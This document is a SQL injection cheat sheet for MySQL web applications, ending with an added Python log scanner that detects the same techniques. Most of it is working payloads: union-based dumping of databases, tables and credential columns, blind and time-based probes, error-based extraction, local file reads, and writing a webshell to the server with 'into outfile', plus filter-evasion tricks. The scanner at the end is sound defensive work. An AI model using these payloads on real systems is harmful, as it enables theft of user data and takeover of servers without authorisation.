MySQL SQL Injection Notes

Basic error-based checks

  • Guess the number of columns

    order by n/*

Numeric injection

  • Get the current database name:

    http://a.com/test/1.php?id=1 and 1=2 union select GROUP_CONCAT(DISTINCT+database()),2 from information_schema.columns

  • Get all table names:

    http://a.com/test/1.php?id=1 and 1=2 union select GROUP_CONCAT(DISTINCT+table_name),2 from information_schema.columns+where+table_schema=0x7374756479 // 0x7374756479 is the database name in hex

  • Get all columns of a table:

    http://a.com/test/1.php?id=1 and 1=2 union select GROUP_CONCAT(DISTINCT+column_name),2 from information_schema.columns+where+table_name=0x7573657273 and table_schema=0x7374756479 // 0x7573657273 is the table name in hex

  • Get the data:

    http://a.com/test/1.php?id=1 and 1=2 union select concat(column1,0x2323,column2),2 from tablename

String injection

http://a.com/test/1.php?id=admin%' and 1=2 union select 1,2,concat(name,0x2323,pass) from users%23

Blind injection

  • Using ascii (works best combined with binary search)
    • Get the database name

      http://a.com/test/1.php?id=1 and ord(substr(database(),1,1))=115 // tests the ASCII code of the first character of the database name; if it does not equal the number given, an error is returned…

    • Get table names

      http://a.com/test/1.php?id=1 and ord(substr((select distinct table_name from information_schema.columns where table_schema=0x7374756479 limit 1,1),1,1))=97

    • Get columns

      http://a.com/test/1.php?id=1 and ord(substr((select name from users limit 0,1),1,1))=117

    • Get data

      http://a.com/test/1.php?id=1 and ord(substr((select name from users limit 0,1),1,1))=117

  • Using regular expressions

    and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)

Time-based blind injection

SELECT target_column FROM target_table WHERE id=1 UNION SELECT IF(ord(substr(database(),1,1))=115, sleep(5),1)

Error-based injection

  • http://www.waitalone.cn/sql.php?id=1+and(select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name) as b)

  • updatexml(0x7e, concat((select user())),1) --+

MySQL file read/write

  • create table a(cmd text);load data infile 'c:\xxx\xxx\xxx.txt' into table a;select * from a;
  • create table a(cmd text);insert into a(cmd) values(load_file('c:\ddd\ddd\ddd.txt'));select * from a
  • load_file(char(32,26,56,66))
  • load_file(0x633A5C626F6F742E696E69)
  • union select 1,2,3,char(your one-line webshell code here, converted to decimal or hex),5,6,7,8,9,10,7 into outfile 'd:web90team.php'/*
  • union select 1,2,3,load_file('d:weblogo123.jpg'),5,6,7,8,9,10,7 into outfile 'd:web90team.php'/*

Injection tips

  • Injection when spaces are filtered: use /**/, () or + in place of spaces

    %0c = form feed, new page

    %09 = horizontal tab

    %0d = carriage return

    %0a = line feed, new line

  • Related functions

    system_user() system user name

    user() user name

    current_user current user name

    session_user() user name of the database connection

    database() database name

    version() MySQL version

    load_file() MySQL function for reading a local file

    @@datadir data directory path

    @@basedir MySQL install path

    @@version_compile_os operating system

  • Check whether the account has file read/write privileges

    • and (select count(*) from mysql.user)>0/*
    • and (select count(file_priv) from mysql.user)>0/*
  • The sleep function specifies the pause per record returned, so the total delay depends on the number of records.
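As an added, defender-side example that is not part of the original notes: a small Python scanner that flags the techniques listed above (union/information_schema dumps, ord(substr()) blind probes, sleep() delays, updatexml/floor(rand()) error payloads and load_file/into outfile) in web-server access logs, after undoing the whitespace substitutes from the tips section (+, %09, %0a, %0c, %0d and /**/). The log lines are constructed samples, and the log format and signature names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# One signature per technique covered in these notes, applied after normalisation.
# Where the notes show a space, \W+ is used so "union(select" and "union/**/select" also match.
SIGNATURES = {
    "union_schema_dump": re.compile(r"\bunion\W+select\b.*\binformation_schema\b"),
    "boolean_blind": re.compile(r"\b(?:ord|ascii)\W*\(\W*substr"),
    "time_blind": re.compile(r"\b(?:sleep|benchmark)\W*\("),
    "error_based": re.compile(r"\b(?:updatexml|extractvalue)\W*\(|\bfloor\W*\(\W*rand\W*\("),
    "file_io": re.compile(r"\bload_file\W*\(|\binto\W+(?:out|dump)file\b"),
}

def normalise(query_string):
    """URL-decode, lower-case, and fold the whitespace substitutes listed in the notes
    (/**/ comments, '+', %09, %0a, %0c, %0d) into single spaces."""
    s = unquote_plus(query_string).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"[\t\n\x0b\x0c\r ]+", " ", s)

def classify(request_path):
    """Return the sorted list of technique labels whose signature fires on one request path."""
    if "?" not in request_path:
        return []
    query = normalise(request_path.split("?", 1)[1])
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(lines):
    """Return [(line_number, labels)] for every combined-format log line that matches a signature."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        labels = classify(m.group(1)) if m else []
        if labels:
            hits.append((n, labels))
    return hits

# Constructed sample access-log lines (not from the original page); the last line is a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /test/1.php?id=1+and+1=2+union+select+GROUP_CONCAT(DISTINCT+table_name),2+from+information_schema.columns HTTP/1.1" 200 700',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /test/1.php?id=1%09and%09ord(substr(database(),1,1))=115 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /test/1.php?id=1/**/union(select(if(1=1,sleep(5),1)),2)/**/from/**/information_schema.tables HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /test/1.php?id=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, labels in scan_log(SAMPLE_LOG):
        print(n, ",".join(labels))
```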